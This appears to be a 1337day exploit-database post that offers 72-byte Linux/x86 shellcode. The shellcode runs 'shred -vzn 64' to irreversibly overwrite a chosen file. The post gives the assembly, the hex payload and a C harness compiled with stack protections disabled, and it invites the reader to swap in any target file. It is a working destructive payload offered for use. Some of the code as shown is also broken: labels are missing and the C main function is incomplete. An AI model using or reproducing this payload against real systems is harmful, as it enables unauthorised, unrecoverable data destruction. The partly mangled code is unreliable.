Linux/x86 - shred file Shellcode (72 bytes)

ID 1337DAY-ID-32712
Type zdt
Reporter strider
Modified 2019-05-06T00:00:00


Exploit for linux/x86 platform in category shellcode

                                            # Exploit Title: Linux/x86 shred file  (72 bytes)
# Google Dork: None
# Exploit Author: strider
# Vendor Homepage: None
# Software Link: None
# Tested on: Debian 9 Stretch i386/ Kali Linux i386
# CVE : None
# Shellcode Length: 72

This shellcode shred files 64 times

replace test.txt with any file you want.

-----------------------------[Shellcode Dump]---------------------------------
section .text

global _start

  xor eax, eax
  push eax

  push word 0x6465
  push 0x7268732f
  push 0x6e69622f
  push 0x7273752f

  mov ebx, esp
  jmp short _file

  pop ecx
  mov ebp, ecx
  xor ecx, ecx
  push eax
  push 0x6e7a762d
  mov esi, esp

  push eax
  push word 0x3436
  xor edx, edx
  mov edi, esp

  push eax
  push ebp
  push edi
  push esi
  push ebx
  mov ecx, esp
  mov al, 0xb

  int 0x80

  call _params
  string db "test.txt"; replace test.txt with any file you want

 gcc -m32 -fno-stack-protector -z execstack -o tester tester.c


 #include <stdio.h>
 #include <string.h>

 unsigned char shellcode[] = "\x31\xc0\x50\x66\x68\x65\x64\x68\x2f\x73\x68\x72\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\xeb\x21\x59\x89\xcd\x31\xc9\x50\x68\x2d\x76\x7a\x6e\x89\xe6\x50\x66\x68\x36\x34\x31\xd2\x89\xe7\x50\x55\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xda\xff\xff\xff\x74\x65\x73\x74\x2e\x74\x78\x74";
 void main()
     printf("Shellcode Length:  %d\n", strlen(shellcode));

     int (*ret)() = (int(*)())shellcode;

# [2019-05-16]  #